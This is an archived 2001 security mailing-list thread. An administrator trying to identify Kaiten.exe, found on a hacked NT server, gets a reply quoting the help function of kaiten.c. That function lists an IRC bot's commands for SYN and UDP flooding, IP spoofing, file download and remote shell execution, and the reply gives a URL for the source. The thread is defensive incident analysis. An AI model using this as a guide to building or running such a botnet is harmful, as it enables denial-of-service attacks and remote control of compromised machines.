this appears to be a ddos tool for irc. from kaiten.c help function (http://packetstorm.securify.com/DoS/kaiten.c): void help(int sock, char *sender, int argc, char **argv) { if (mfork() != 0) return; Send(sock,"NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n",sender); sleep(2); Send(sock,"NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls\n",sender); sleep(2); Send(sock,"NOTICE %s :NICK <nick> = Changes the nick of the knight\n",sender); sleep(2); Send(sock,"NOTICE %s :GETSPOOF = Gets the current spoofing\n",sender); sleep(2); Send(sock,"NOTICE %s :PAN <target> <secs> = An advanced syn flooder that will kill most network drivers\n",sender); sleep(2); Send(sock,"NOTICE %s :UDP <target> <port> <secs> = My special++ exploit\n",sender); sleep(2); Send(sock,"NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n",sender); sleep(2); Send(sock,"NOTICE %s :DNS <host> = DNSs a host\n",sender); sleep(2); Send(sock,"NOTICE %s :CHECKSUM <on/off> = Turns checksum on or off\n",sender); sleep(2); Send(sock,"NOTICE %s :IRC <command> = Sends this command to the server\n",sender); sleep(2); Send(sock,"NOTICE %s :SH <command> = Executes a command\n",sender); sleep(2); Send(sock,"NOTICE %s :KILLALL = Kills all current packeting\n",sender); sleep(2); Send(sock,"NOTICE %s :KILL = Kills the knight\n",sender); sleep(2); Send(sock,"NOTICE %s :DISABLE = Disables all packeting from this knight\n",sender); sleep(2); Send(sock,"NOTICE %s :ENABLE = Enables all packeting from this knight\n",sender); sleep(2); Send(sock,"NOTICE %s :VERSION = Requests version of knight\n",sender); sleep(2); Send(sock,"NOTICE %s :HELP = Displays this\n",sender); exit(0); } Youn Gonzales System Administrator CLAS Net Inc. Comptia A+, Network+ Cisco CCNA Chicken is tasty.. ----- Original Message ----- From: "C Boening" <txfmfdocat_private> To: <INCIDENTSat_private> Sent: Sunday, May 06, 2001 9:45 AM Subject: Kaiten.exe DoS ? > Has anyone ever heard of a DoS named Kaiten? I have been able to find > only one relevant reference on the net for kaiten.c , which lists the > code for it. I have found on one of my servers a program nammed > Kaiten.exe (installed on 15 April 01, two minutes AFTER someone hacked > into one of our other servers using the IIS unicode exploit.The intruder > put kaiten.exe at the end of his script used to hack in) for which I > have found absolutely no info anywhere. OS is WinNT server 4.0 . File > size for Kaiten.exe is 52 k's, whereas the kaiten.c is only 32 k's. I am > new to the whole security business, moving up from tech support... I > have copied Kaiten.exe on an NT box removed from the network and sure > enough it tried to connect to the internet ...
This archive was generated by hypermail 2b30 : Mon May 07 2001 - 14:09:19 PDT